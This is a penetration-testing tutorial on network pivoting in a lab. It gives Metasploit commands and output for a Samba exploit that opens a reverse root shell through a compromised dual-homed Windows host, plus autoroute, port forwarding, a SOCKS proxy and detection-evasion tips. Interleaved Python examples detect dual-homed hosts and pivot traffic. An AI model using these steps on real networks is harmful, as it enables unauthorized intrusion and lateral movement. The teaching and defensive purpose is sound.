🔐 Network Pivoting in Ethical Hacking

A Comprehensive Guide to Advanced Penetration Testing Techniques

📋 Introduction to Network Pivoting

Network pivoting is an advanced penetration testing technique that allows ethical hackers to access and compromise systems that are not directly reachable from their attacking machine. This method uses a compromised system as a "pivot point" or "stepping stone" to reach other systems within internal networks that would otherwise be inaccessible.

Key Concept: Pivoting transforms a compromised machine into a bridge between the attacker's network and an isolated target network, enabling lateral movement within the infrastructure.

🎯 Understanding the Pivoting Scenario

Network Topology Overview

[Network topology diagram: the Attacker Network (NAT) holds Kali Linux (Attacker) and the compromised Windows 10 machine; the Target Network (Bridged) holds the same Windows 10 machine (Pivot Point), Metasploitable (Target), an iPhone and another device.]

The Windows 10 machine acts as the pivot point, connecting two separate networks

Network Configuration:
  • Kali Linux: Connected to NAT network (10.20.14.x)
  • Windows 10: Dual-homed with two network adapters (NAT + Bridged)
  • Metasploitable: Connected only to Bridged network (10.20.15.x)
  • Reachability: Metasploitable is invisible to Kali but visible to Windows 10

⚙️ Virtual Machine Network Configuration

Kali Linux Configuration

The Kali Linux machine remains on the NAT network. This is the standard configuration used throughout penetration testing to gain initial access to target systems.

Network Adapter: NAT (Default)
Purpose: Initial attack vector

Windows 10 Configuration (Pivot Machine)

The Windows 10 machine requires two network adapters to function as a pivot point. This dual-homed configuration allows it to bridge between the attacker's network and the isolated target network.

Adapter 1: NAT (connects to Kali network)
Adapter 2: Bridged (connects to target network)
Purpose: Acts as network bridge/pivot point

Metasploitable Configuration (Target)

The Metasploitable machine is configured with only a Bridged network adapter, making it unreachable from the Kali Linux machine directly.

Network Adapter: Bridged
IP Address: 10.20.15.4
Purpose: Isolated target system

🔍 The Pivoting Process

Phase 1: Initial Access Attempt (Failure)

First, we demonstrate that direct exploitation fails because the target is not visible from the attacker's network.

msf6 > sessions -l

Active sessions:

  Id  Name  Type             Information          Connection
  --  ----  ----             -----------          ----------
  1         meterpreter x86  NT AUTHORITY\SYSTEM  10.20.14.x -> 10.20.14.y

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(usermap_script) > set RHOST 10.20.15.4
msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
msf6 exploit(usermap_script) > exploit

[-] Exploit failed: Rex::ConnectionTimeout The connection timed out
⚠️ Why This Fails: The Kali Linux machine cannot establish a network connection to the Metasploitable device because they exist on completely different network segments with no routing between them.

Phase 2: Network Discovery

Next, we investigate the compromised Windows machine to identify additional network interfaces that might provide access to other networks.

msf6 > sessions -i 1
[*] Starting interaction with session 1...

meterpreter > ifconfig

Interface 4
============
Hardware MAC : 00:0c:29:xx:xx:xx
IP Address   : 10.20.14.5
Netmask      : 255.255.255.0

Interface 7
============
Hardware MAC : 00:0c:29:yy:yy:yy
IP Address   : 10.20.15.5
Netmask      : 255.255.255.0
✓ Discovery Success: The Windows machine has two network interfaces. Interface 7 (10.20.15.5) is on the same subnet as our target Metasploitable machine (10.20.15.4), providing our pathway to pivot.
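The discovery step above is also the check a defender runs in the other direction: any host with interfaces on two routable subnets is a potential bridge between segments. The following Python script is an added example, not part of the original guide; it parses ifconfig-style text like the meterpreter listing above (the sample text, extra loopback entry and hostname are constructed, with the page's placeholder MAC addresses) and flags hosts that are dual-homed so they can be reviewed against the intended segmentation.

```python
import ipaddress
import re

# Constructed sample, modelled on the meterpreter ifconfig output above;
# MAC addresses are placeholders, as on the page, and the loopback entry is added here.
SAMPLE_IFCONFIG = """
Interface  4
============
Hardware MAC    : 00:0c:29:xx:xx:xx
IP Address      : 10.20.14.5
Netmask         : 255.255.255.0

Interface  7
============
Hardware MAC    : 00:0c:29:yy:yy:yy
IP Address      : 10.20.15.5
Netmask         : 255.255.255.0

Interface  1
============
Hardware MAC    : 00:00:00:00:00:00
IP Address      : 127.0.0.1
Netmask         : 255.0.0.0
"""

IFACE_RE = re.compile(r"Interface\s+(\d+)")
IP_RE = re.compile(r"IP Address\s*:\s*(\S+)")
MASK_RE = re.compile(r"Netmask\s*:\s*(\S+)")


def parse_interfaces(text):
    """Return a list of (interface_id, IPv4Interface) parsed from ifconfig-style text.
    Entries without an IPv4 address/netmask pair (e.g. IPv6-only) are skipped."""
    result = []
    for block in re.split(r"\n(?=Interface\s+\d+)", text.strip()):
        m_if, m_ip, m_mask = IFACE_RE.search(block), IP_RE.search(block), MASK_RE.search(block)
        if not (m_if and m_ip and m_mask):
            continue
        try:
            iface = ipaddress.IPv4Interface(f"{m_ip.group(1)}/{m_mask.group(1)}")
        except ValueError:
            continue  # garbled or non-IPv4 entry
        result.append((int(m_if.group(1)), iface))
    return result


def bridged_networks(interfaces):
    """Routable networks the host sits on; loopback and link-local are not bridges."""
    nets = set()
    for _, iface in interfaces:
        net = iface.network
        if net.is_loopback or net.is_link_local:
            continue
        nets.add(net)
    return nets


def is_dual_homed(interfaces):
    """True when the host can reach two or more distinct routable networks."""
    return len(bridged_networks(interfaces)) >= 2


def inventory_report(hostname, text):
    """One-line finding for an asset inventory review."""
    nets = sorted(bridged_networks(parse_interfaces(text)))
    flag = "DUAL-HOMED: review segmentation" if len(nets) >= 2 else "single-homed"
    return f"{hostname}: {', '.join(map(str, nets))} -> {flag}"


if __name__ == "__main__":
    # Constructed hostname standing in for the page's DESKTOP-XXXXXX
    print(inventory_report("DESKTOP-XXXXXX", SAMPLE_IFCONFIG))
```

Run against each managed host's interface listing, the report gives segmentation reviewers the list of machines that join two networks, which is exactly the property that makes the Windows 10 machine usable as a pivot.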

Phase 3: Establishing the Route (Autoroute)

Using Metasploit's autoroute module, we establish a route through the compromised Windows machine to reach the target network.

meterpreter > background
[*] Backgrounding session 1...
msf6 > use post/multi/manage/autoroute
msf6 post(autoroute) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command
   NETMASK  255.255.255.0    no        Netmask for subnet
   SESSION                   yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf6 post(autoroute) > set SESSION 1
msf6 post(autoroute) > set SUBNET 10.20.15.0
msf6 post(autoroute) > exploit
[*] Running module against DESKTOP-XXXXXX
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.20.15.0/255.255.255.0 from host's routing table.
[*] Post module execution completed

Routing Flow Diagram

[Routing flow diagram: Kali Linux (10.20.14.x) -> Windows 10 (10.20.14.5, NAT adapter) -> Windows 10 (10.20.15.5, Bridged adapter) -> Metasploitable (10.20.15.4)]

Traffic flows through the compromised Windows machine to reach the isolated target
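To make the routing step concrete, here is an added Python model of the per-session route table that autoroute populates. It is not Metasploit's code and simplifies it: routes map a subnet to the session whose host can reach it, lookups use longest-prefix match, and any address without a matching route is sent directly from the attacking machine. The remove method corresponds to the route clean-up recommended under best practices. The attacker address 10.20.14.2 is constructed to stand in for the page's 10.20.14.x, and the autoadd helper is a simplified assumption about what CMD=autoadd does (it ignores the host's own routing table, which the real module also consults).

```python
import ipaddress


class SessionRouteTable:
    """Minimal model of Metasploit's session routing table (an illustration, not its code)."""

    def __init__(self):
        self.routes = []  # list of (IPv4Network, session_id)

    def add(self, subnet, netmask, session_id):
        """Add a route; returns False if the identical route already exists."""
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        if any(n == net and s == session_id for n, s in self.routes):
            return False
        self.routes.append((net, session_id))
        return True

    def remove(self, subnet, netmask, session_id):
        """Remove a route (the clean-up step); returns True if something was removed."""
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        before = len(self.routes)
        self.routes = [(n, s) for n, s in self.routes if not (n == net and s == session_id)]
        return len(self.routes) != before

    def lookup(self, ip):
        """Session id that carries traffic for ip (longest prefix wins), or None for direct."""
        addr = ipaddress.IPv4Address(ip)
        best = None
        for net, sid in self.routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return best[1] if best else None

    def path(self, attacker_ip, ip, pivots):
        """Hop list for a packet to ip; pivots maps session id -> (outer_ip, inner_ip) of the pivot host."""
        sid = self.lookup(ip)
        if sid is None:
            return [attacker_ip, ip]
        outer_ip, inner_ip = pivots[sid]
        return [attacker_ip, outer_ip, inner_ip, ip]


def autoadd(table, session_id, interface_networks):
    """Simplified model of CMD=autoadd (assumption): add a route for every routable
    network the session host sits on. Returns the networks actually added."""
    added = []
    for net in interface_networks:
        net = ipaddress.IPv4Network(net)
        if net.is_loopback or net.is_link_local:
            continue
        if table.add(str(net.network_address), str(net.netmask), session_id):
            added.append(net)
    return added


if __name__ == "__main__":
    table = SessionRouteTable()
    table.add("10.20.15.0", "255.255.255.0", 1)          # what the page's SUBNET setting adds
    pivots = {1: ("10.20.14.5", "10.20.15.5")}            # session 1's two legs, from the ifconfig output
    print(table.path("10.20.14.2", "10.20.15.4", pivots))  # via the pivot
    print(table.path("10.20.14.2", "10.20.14.9", pivots))  # direct, no route matches
    table.remove("10.20.15.0", "255.255.255.0", 1)         # clean-up when the engagement step is done
```

Reading the model against the diagram: the only thing the route adds is the decision that 10.20.15.0/24 is reached through session 1; the pivot host's own interfaces then carry the packet from its NAT leg to its Bridged leg.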

Phase 4: Successful Exploitation Through Pivot

With the route established, we can now successfully exploit the target system through the pivot point.

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(usermap_script) > set RHOST 10.20.15.4
msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
msf6 exploit(usermap_script) > exploit
[*] Started reverse TCP handler on 10.20.14.x:4444
[*] Command shell session 2 opened

id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP i686 GNU/Linux
pwd
/root
ls
Desktop
vnc.log
✓ Exploitation Success: We have achieved root-level access on the Metasploitable target through the pivot. All commands now execute on the target system, demonstrating complete compromise.

📊 Comparison: Direct vs. Pivoted Attacks

Aspect              | Direct Attack                               | Pivoted Attack
--------------------+---------------------------------------------+-----------------------------------------------
Network Visibility  | Target must be on same network or routable  | Target can be on isolated network
Prerequisites       | Direct network access                       | Compromised pivot machine required
Complexity          | Simple, single-step                         | Multi-stage, requires routing
Detection Risk      | Higher (direct connection)                  | Lower (traffic appears internal)
Tool Availability   | All tools available                         | Limited to uploaded tools or Metasploit modules
Real-World Scenario | External perimeter testing                  | Internal network penetration

🛠️ Alternative Pivoting Techniques

1. Manual Tool Upload Method

Instead of using Metasploit's routing capabilities, you can manually upload scanning and exploitation tools to the compromised pivot machine.

meterpreter > upload /usr/bin/nmap C:\\Tools\\nmap.exe
[*] uploading : /usr/bin/nmap -> C:\Tools\nmap.exe
[*] uploaded  : /usr/bin/nmap -> C:\Tools\nmap.exe
meterpreter > shell
C:\> nmap -sV 10.20.15.0/24

2. Port Forwarding

Forward specific ports from the target network through the pivot machine to your attacking machine.

meterpreter > portfwd add -l 8080 -p 80 -r 10.20.15.4
[*] Local TCP relay created: :8080 <-> 10.20.15.4:80

3. SOCKS Proxy

Establish a SOCKS proxy through the Meterpreter session for more flexible routing.

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(socks_proxy) > set SRVPORT 1080
msf6 auxiliary(socks_proxy) > set VERSION 4a
msf6 auxiliary(socks_proxy) > run
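The comparison table notes that pivoted traffic looks internal to the target segment, and the port-forward and SOCKS variants above share the same shape on the wire as the autoroute method: the pivot host holds a connection on its outer leg while fanning new connections out of its inner leg. The following Python detection routine is an added example, not part of the original guide. It runs over constructed flow records (timestamp, source, source port, destination, destination port) with a constructed asset inventory such as the dual-homed check would produce, treats /24 as the segment boundary (an assumption for this lab), and flags a multi-homed host that, while connected on one segment, opens several new connections into another within a short window.

```python
import ipaddress
from collections import defaultdict

# Constructed asset inventory: hostname -> addresses it holds.
ASSETS = {
    "DESKTOP-PIVOT": {"10.20.14.5", "10.20.15.5"},
    "SRV-FILE": {"10.20.15.4"},
}

# Constructed flow records: (seconds, src, sport, dst, dport). Addresses follow the page's lab;
# 10.20.14.2 stands in for the attacking machine's 10.20.14.x.
FLOWS = [
    (0,   "10.20.14.5", 49152, "10.20.14.2", 4444),  # pivot's outer leg: long-lived session to the attacker box
    (30,  "10.20.14.5", 49153, "10.20.14.2", 443),
    (60,  "10.20.15.5", 49201, "10.20.15.4", 139),   # pivot's inner leg fans out into the target segment
    (61,  "10.20.15.5", 49202, "10.20.15.4", 445),
    (62,  "10.20.15.5", 49203, "10.20.15.4", 80),
    (63,  "10.20.15.5", 49204, "10.20.15.4", 22),
    (64,  "10.20.15.5", 49205, "10.20.15.9", 445),
    (500, "10.20.15.4", 40000, "10.20.15.5", 53),    # single-homed host: never a candidate
    (900, "10.20.15.5", 49300, "10.20.15.4", 445),   # ordinary SMB with no concurrent outer-leg session
]


def segment(ip, prefix=24):
    """Segment key for an address; the /24 boundary is an assumption for this lab."""
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def find_pivot_candidates(flows, assets, window=300, min_fanout=3):
    """Flag multi-homed hosts that, while holding a connection on one segment, originate
    at least min_fanout new connections into a different segment within `window` seconds.
    Returns {host: {"targets": [(dst, dport), ...], "outer_peers": [ip, ...]}}."""
    addr_to_host = {a: h for h, addrs in assets.items() for a in addrs}

    # Only hosts whose addresses span two or more segments can relay between them.
    per_host = defaultdict(list)
    for rec in sorted(flows):
        host = addr_to_host.get(rec[1])
        if host and len({segment(a) for a in assets[host]}) >= 2:
            per_host[host].append(rec)

    findings = {}
    for host, recs in per_host.items():
        targets, peers = set(), set()
        for ts, src, _, dst, dport in recs:
            seg = segment(src)
            # Flows this host originated from a *different* segment shortly before this one
            concurrent = [r for r in recs if ts - window <= r[0] <= ts and segment(r[1]) != seg]
            if concurrent:
                targets.add((dst, dport))
                peers.update(r[3] for r in concurrent)
        if len(targets) >= min_fanout:
            findings[host] = {"targets": sorted(targets), "outer_peers": sorted(peers)}
    return findings


if __name__ == "__main__":
    for host, info in find_pivot_candidates(FLOWS, ASSETS).items():
        print(f"{host}: {len(info['targets'])} cross-segment connections while talking to {info['outer_peers']}")
```

The rule deliberately keys on the host rather than on either address, because each address on its own looks ordinary: the target segment sees only 10.20.15.5 connecting to neighbours, and the outer segment sees only a workstation with an outbound session. Tune window and min_fanout against a baseline of the legitimately dual-homed machines (VPN concentrators, jump hosts) before alerting on it.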

⚡ Best Practices and Recommendations

Security Considerations

  • Minimize Tool Upload: Uploading tools to compromised systems increases detection risk and leaves forensic evidence. Use built-in tools or Metasploit modules when possible.
  • Maintain Session Stability: Keep your pivot session stable and establish backup sessions in case the primary connection is lost.
  • Clean Up Routes: Remove autoroutes when finished to avoid leaving persistent backdoors.
  • Document Everything: Keep detailed records of all pivoting routes and compromised systems for reporting and cleanup.

Legal and Ethical Warnings

  • Only perform pivoting attacks in authorized penetration testing engagements
  • Ensure your scope of work explicitly covers internal network testing
  • Obtain written permission before accessing systems through pivot points
  • Be aware that pivoting can affect production systems and network performance

🎓 Key Takeaways

Essential Concepts to Remember:
  1. Pivoting enables access to isolated networks by using compromised systems as bridges
  2. Dual-homed machines (systems with multiple network interfaces) make ideal pivot points
  3. Metasploit's autoroute module simplifies routing configuration for pivoting attacks
  4. Network reconnaissance on compromised systems reveals additional attack surfaces
  5. Multiple pivoting methods exist, each with different use cases and advantages
  6. Stealth and operational security are crucial when conducting pivoted attacks

📚 Further Learning Resources

To deepen your understanding of network pivoting and lateral movement techniques, consider exploring:

Practice Makes Perfect: Set up your own lab environment with multiple network segments to practice these techniques safely. Experiment with different network topologies, operating systems, and exploitation scenarios to build practical experience.